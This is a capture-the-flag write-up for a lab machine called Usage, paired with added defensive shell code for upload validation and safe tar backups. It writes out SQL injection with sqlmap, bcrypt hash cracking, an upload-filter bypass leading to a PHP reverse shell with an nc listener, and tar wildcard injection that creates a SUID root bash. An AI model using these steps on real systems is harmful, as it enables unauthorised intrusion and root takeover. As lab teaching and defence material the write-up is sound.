Usage
Reconnaissance
Starting with our initial Nmap scan:
nmap -sC -sV -oN nmap/initial 10.10.11.18
The scan reveals two open ports:
- Port 22 — SSH
- Port 80 — HTTP
Enumeration
We add usage.htb to our /etc/hosts file and browse to port 80, where we find a blog website with user registration and login functionality.
Basic SQL injection payloads on the login page either bypass authentication or produce an error, and the password reset function turns out to be vulnerable to SQL injection as well.
Foothold
Using sqlmap on the password reset endpoint, we map out the database:
sqlmap -r request.txt --batch --dbs
The database contains user credentials, including an administrator hash. We crack the hash using hashcat:
hashcat -m 3200 hash.txt rockyou.txt
Logging in as the admin, we find an option to upload an avatar. The file upload functionality has a bypass that permits uploading PHP files disguised as images (e.g., using a .php.jpg extension and modifying the magic bytes).
We upload a standard PHP reverse shell and trigger it by navigating to /uploads/profile.php.
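From the defender's side, the two tricks used here (a double extension such as .php.jpg and forged magic bytes) are exactly what a server-side upload check has to cover. The following POSIX sh function is an added example, not code from the writeup or from the target application; the allowlist, the token blocklist and the file names are constructed for illustration. It rejects any dot-separated token that the web server might execute, requires an allowlisted final extension, and verifies the leading bytes against the claimed type.

```shell
#!/bin/sh
# Added example (not from the original writeup): server-side validation for an
# avatar upload. Hypothetical allowlist/blocklist; needs only POSIX sh, head, od, tr.

ALLOWED_EXT="jpg jpeg png gif"
# Extensions a typical PHP-enabled web server would hand to the interpreter.
EXEC_TOKENS="php phtml phar php3 php5 php7 phps"

# magic_hex PATH -> hex string of the first four bytes of the file
magic_hex() {
    head -c 4 "$1" | od -An -tx1 | tr -d ' \n'
}

# check_upload NAME PATH -> 0 when the upload is acceptable, 1 otherwise
check_upload() {
    name=$1
    path=$2
    lower=$(printf '%s' "$name" | tr 'A-Z' 'a-z')

    # 1. Walk every dot-separated token after the first; "shell.php.jpg" is
    #    rejected because "php" appears, even though the final extension is jpg.
    rest=$lower
    while [ "${rest#*.}" != "$rest" ]; do
        rest=${rest#*.}
        tok=${rest%%.*}
        for e in $EXEC_TOKENS; do
            if [ "$tok" = "$e" ]; then
                echo "reject: executable token '$tok' in filename" >&2
                return 1
            fi
        done
    done

    # 2. The final extension must be on the allowlist.
    ext=${lower##*.}
    ok=0
    for e in $ALLOWED_EXT; do
        [ "$ext" = "$e" ] && ok=1
    done
    if [ "$ok" -ne 1 ]; then
        echo "reject: extension '$ext' is not allowed" >&2
        return 1
    fi

    # 3. The content must start with the magic bytes of the claimed type.
    #    Forged magic bytes pass this step, which is why the stored file must
    #    also get a server-chosen name in a directory with script execution off.
    case "$ext:$(magic_hex "$path")" in
        jpg:ffd8ff*|jpeg:ffd8ff*|png:89504e47|gif:47494638) ;;
        *)
            echo "reject: content does not look like a '$ext' file" >&2
            return 1
            ;;
    esac
    return 0
}
```

The check deliberately refuses rather than renames: a name such as avatar.php.jpg has no legitimate reason to reach an avatar endpoint. Because step 3 is defeated by prepending real JPEG bytes to a script, the remaining control is how the file is stored and served, not how it is named by the client.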
nc -lvnp 4444
We receive a shell as the user dash.
cat /home/dash/user.txt
Privilege Escalation
Enumerating the system, we check processes and cron jobs. We find an interesting backup script running periodically as root. The script passes an unquoted wildcard * to tar to compress the contents of a directory.
cat /usr/local/bin/backup.sh
# tar -czf /var/backups/backup.tar.gz *
This is vulnerable to a classic wildcard injection. We create two files named --checkpoint=1 and --checkpoint-action=exec=sh exploit.sh in the directory being backed up.
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > exploit.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh exploit.sh"
Once the cron job executes, it runs our exploit.sh script with root privileges, giving SUID permissions to our copy of bash.
/tmp/bash -p
whoami
# root
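The root cause is that the shell expands * into the argument list before tar parses it, so any filename beginning with - is read as an option. The following shell snippet is an added example, not the box's script or anything from the writeup: it shows the backup rewritten so that expansion can never produce an option (-- ends option parsing, and ./* anchors every member name), plus a pre-flight audit that flags option-looking filenames before the job runs. It assumes GNU tar; the directory paths are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original writeup): a wildcard-safe replacement
# for a root cron backup, with an audit step. Assumes GNU tar; paths are hypothetical.

# audit_dir DIR -> 0 when no entry in DIR starts with '-', 1 otherwise.
# Run this from the job (or a monitoring check) to spot planted filenames early.
audit_dir() {
    dir=$1
    found=0
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue          # glob did not match anything
        echo "suspicious filename in $dir: ${f##*/}"
        found=1
    done
    return $found
}

# safe_backup SRC OUT -> archive SRC's contents into OUT without option injection.
# '--' stops tar from parsing options, and './*' makes every expanded name begin
# with './', so "--checkpoint-action=..." is stored as data, never interpreted.
safe_backup() {
    src=$1
    out=$2
    ( cd "$src" && tar -czf "$out" -- ./* )
}

# Equivalent for very large trees, avoiding the glob altogether:
#   find "$src" -mindepth 1 -print0 | tar --null -czf "$out" -T -
```

With the hardened form the planted files still end up in the archive, as the job intends, but nothing is executed. The audit is cheap enough to run on every invocation and gives a log line worth alerting on, since legitimate data directories rarely contain names that start with a dash.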
Root flag captured! 🏴
